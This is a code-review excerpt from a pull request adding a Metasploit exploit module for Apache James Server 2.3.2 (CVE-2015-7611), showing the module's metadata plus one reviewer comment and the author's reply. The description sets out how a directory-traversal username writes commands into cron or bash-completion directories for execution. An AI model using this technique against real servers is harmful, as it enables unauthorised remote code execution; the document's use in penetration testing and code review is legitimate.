modules/exploits/linux/smtp/apache_james_exec.rb

```diff
@@ -0,0 +1,187 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
+      'Description'    => %q{
+        This module exploits a vulnerability that exists due to a lack of input
+        validation when creating a user. Messages for a given user are stored
+        in a directory partially defined by the username. By creating a user
+        with a directory traversal payload as the username, commands can be
+        written to a given directory. To use this module with the cron
+        exploitation method, run the exploit using the given payload, host, and
+        port. After running the exploit, the payload will be executed within 60
+        seconds. Due to differences in how cron may run in certain Linux
+        operating systems such as Ubuntu, it may be preferable to set the
+        target to Bash Completion as the cron method may not work. If the target
+        is set to Bash completion, start a listener using the given payload,
+        host, and port before running the exploit. After running the exploit,
+        the payload will be executed when a user logs into the system. For this
+        exploitation method, bash completion must be enabled to gain code
+        execution. This exploitation method will leave an Apache James mail
+        object artifact in the /etc/bash_completion.d directory and the
+        malicious user account.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'Palaczynski Jakub', # Discovery
+        'Matthew Aberegg',   # Metasploit
+        'Michael Burkey'     # Metasploit
+      ],
+      'References'     =>
+      [
+        [ 'CVE', '2015-7611' ],
+        [ 'EDB', '35513' ],
+        [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
+      ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+      [
+        [ 'Bash Completion', {
+          'ExploitPath' => 'bash_completion.d',
```

Comment:
`ExploitPath` isn't standard convention. That's not a problem, but the literal value also isn't used anywhere, except for determining which code path to take. Instead, you could remove `ExploitPath` and use `target.name`. ie:

```ruby
if target.name == 'Bash Completion'
# do a thing
end
if target.name == 'Cron'
# do a different thing
end
```

Reply:
Yes, this was my attempt to reduce having multiple target options with similar values.